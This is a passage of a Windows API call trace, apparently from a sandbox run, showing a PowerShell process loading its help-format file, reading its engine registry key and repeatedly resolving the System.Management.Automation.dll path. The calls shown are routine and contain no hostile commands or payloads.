	[0062.632] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.632] GetLastError () returned 0x0
	[0062.632] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.632] GetLastError () returned 0x0
	[0062.632] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.632] GetLastError () returned 0x0
	[0062.632] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.632] GetLastError () returned 0x0
	[0062.633] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0xf37, lpOverlapped=0x0) returned 1
	[0062.633] GetLastError () returned 0x0
	[0062.633] ReadFile (in: hFile=0x2fc, lpBuffer=0x24702e7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x24702e7*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.633] GetLastError () returned 0x0
	[0062.633] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.633] GetLastError () returned 0x0
	[0062.633] CloseHandle (hObject=0x2fc) returned 1
	[0062.633] GetLastError () returned 0x0
	[0062.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.633] GetLastError () returned 0x0
	[0062.633] SetErrorMode (uMode=0x1) returned 0x1
	[0062.633] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2491c0c | out: lpFileInformation=0x2491c0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0062.633] GetLastError () returned 0x0
	[0062.633] SetErrorMode (uMode=0x1) returned 0x1
	[0062.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.633] GetLastError () returned 0x0
	[0062.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.634] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.634] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.634] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.634] GetLastError () returned 0x0
	[0062.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.634] GetLastError () returned 0x0
	[0062.644] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x291e4fec, Data2=0xddf9, Data3=0x4b3e, Data4=([0]=0x90, [1]=0x8b, [2]=0x87, [3]=0x11, [4]=0xc8, [5]=0x78, [6]=0xa0, [7]=0x8a))) returned 0x0
	[0062.644] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x76413c91, Data2=0xcf30, Data3=0x47c8, Data4=([0]=0xac, [1]=0xdf, [2]=0xfa, [3]=0xd9, [4]=0x27, [5]=0xa7, [6]=0x4, [7]=0x74))) returned 0x0
	[0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.644] GetLastError () returned 0x0
	[0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.644] GetLastError () returned 0x0
	[0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.644] GetLastError () returned 0x0
	[0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.644] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe0dc2633, Data2=0x975a, Data3=0x4d11, Data4=([0]=0x96, [1]=0x2f, [2]=0x6f, [3]=0xe8, [4]=0x5a, [5]=0x11, [6]=0x66, [7]=0xa7))) returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.663] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.664] GetLastError () returned 0x0
	[0062.665] VirtualQuery (in: lpAddress=0xad024, lpBuffer=0xae024, dwLength=0x1c | out: lpBuffer=0xae024*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.667] VirtualQuery (in: lpAddress=0xad060, lpBuffer=0xae060, dwLength=0x1c | out: lpBuffer=0xae060*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.667] GetLastError () returned 0x0
	[0062.668] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.668] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.668] GetLastError () returned 0x0
	[0062.669] VirtualQuery (in: lpAddress=0xad390, lpBuffer=0xae390, dwLength=0x1c | out: lpBuffer=0xae390*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.669] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.669] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.670] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.671] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.671] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.671] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.671] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.671] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.672] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.672] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.673] VirtualQuery (in: lpAddress=0xad364, lpBuffer=0xae364, dwLength=0x1c | out: lpBuffer=0xae364*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.673] VirtualQuery (in: lpAddress=0xad1cc, lpBuffer=0xae1cc, dwLength=0x1c | out: lpBuffer=0xae1cc*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.673] VirtualQuery (in: lpAddress=0xad328, lpBuffer=0xae328, dwLength=0x1c | out: lpBuffer=0xae328*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
